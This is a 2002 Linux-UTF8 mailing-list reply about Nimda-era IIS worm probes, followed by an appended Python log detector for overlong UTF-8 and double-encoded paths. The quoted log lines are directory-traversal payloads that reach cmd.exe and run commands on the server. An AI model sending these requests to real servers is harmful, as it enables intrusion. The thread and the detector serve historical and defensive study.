On 2002-02-14 22:50 Markus Kuhn wrote:
> For those of you still wondering what I was worried about a few years
> ago with regard to overlong UTF-8 sequences, here is an extract from
> our httpd log files:
>
> ...
> GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
> GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
> GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
> GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
> GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
> GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
> GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
> GET /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
> GET /msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
> GET /msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
> GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
> GET /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
> GET /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
> ...
>
> P.S.: Has anyone an idea which IIS worm performs the above HTTP
> vulnerability tests? Is it one of the later Nimda variants or
> something else?
Think it is one of the earliest Nimda variants. My access_log and
error_log were flooded with similar false hits. About 190.000 hits like
that in one day. Think it was around 2001-09-19, after some days it
decreased quite rapidly. Filled up my log partition first, though. Quite
annoying.

I really wonder how much bandwidth resources those worms throw away.
Guess when micro$oft gets this .net thing on track with their funny
protocols things will not actually improve.

Øyvind

+===================================================================+
| OpenPGP: 0xAD19826C 2000-01-24 Øyvind A. Holm <[EMAIL PROTECTED]> |
| Fingerprint: EAE5 DCA0 0626 5DAA 72F8 0435 2E2B E476 AD19 826C |
+=========== 2 + 2 = 5 for extremely large values of 2. ============+
--
Linux-UTF8: i18n of Linux on all levels
Archive: http://mail.nl.linux.org/linux-utf8/
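A small log-side detector for the request forms quoted in the thread, added here as an example and not part of the original messages or of any project: it percent-decodes a path once, then flags UTF-8 sequences that are overlong (a strict RFC 3629 decoder rejects them; a lenient one maps e.g. C0 AF to '/') and paths that are still percent-encoded after one decode (the %255c family). The sample paths are constructed, modelled on the log excerpt, and the function names are my own.

```python
import re
# Constructed request paths modelled on the thread's log excerpt (not real log data).
SAMPLE_PATHS = [
    "/scripts/..%c0%af../winnt/system32/cmd.exe",              # 2-byte overlong '/'
    "/scripts/..%e0%80%af../winnt/system32/cmd.exe",           # 3-byte overlong '/'
    "/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe",  # 6-byte overlong '/'
    "/msadc/..%255c../..%255c../winnt/system32/cmd.exe",       # double-encoded '\'
    "/caf%c3%a9/index.html",                                   # well-formed UTF-8, benign
]
_PCT = re.compile(r"%([0-9A-Fa-f]{2})")

def percent_decode_once(path: str) -> bytes:
    """Decode exactly one layer of %XX escapes to raw bytes; everything else passes through."""
    out, i = bytearray(), 0
    while i < len(path):
        m = _PCT.match(path, i)
        if m:
            out.append(int(m.group(1), 16)); i = m.end()
        else:
            out.extend(path[i].encode("utf-8")); i += 1
    return bytes(out)

def find_overlong_utf8(data: bytes) -> list:
    """Return (offset, length, code_point) for each multibyte sequence that is overlong
    (encodable in fewer bytes) or longer than the 4 bytes RFC 3629 allows. A strict
    decoder rejects these; a lenient one silently turns e.g. C0 AF into '/'."""
    findings, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80: i += 1; continue                     # plain ASCII
        # lead byte -> (sequence length, payload bits, lowest code point this length may carry)
        if   0xC0 <= b <= 0xDF: length, cp, low = 2, b & 0x1F, 0x80
        elif 0xE0 <= b <= 0xEF: length, cp, low = 3, b & 0x0F, 0x800
        elif 0xF0 <= b <= 0xF7: length, cp, low = 4, b & 0x07, 0x10000
        elif 0xF8 <= b <= 0xFB: length, cp, low = 5, b & 0x03, 0x200000
        elif 0xFC <= b <= 0xFD: length, cp, low = 6, b & 0x01, 0x4000000
        else: i += 1; continue                            # stray continuation byte, FE or FF
        tail = data[i + 1:i + length]
        if len(tail) != length - 1 or any(not 0x80 <= t <= 0xBF for t in tail):
            i += 1; continue                              # truncated or malformed, not overlong
        for t in tail:
            cp = (cp << 6) | (t & 0x3F)
        if cp < low or length > 4:
            findings.append((i, length, cp))
        i += length
    return findings

def classify(path: str) -> dict:
    """Flag one request path for overlong UTF-8 and for a second layer of %-encoding."""
    raw = percent_decode_once(path)
    return {"overlong": find_overlong_utf8(raw), "double_encoded": bool(_PCT.search(raw.decode("latin-1")))}
```

Run `classify()` over the decoded request path of each access_log line; either flag on a path that also contains `..` is a strong indicator of the traversal probes shown above, while a well-formed sequence such as C3 A9 passes untouched.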
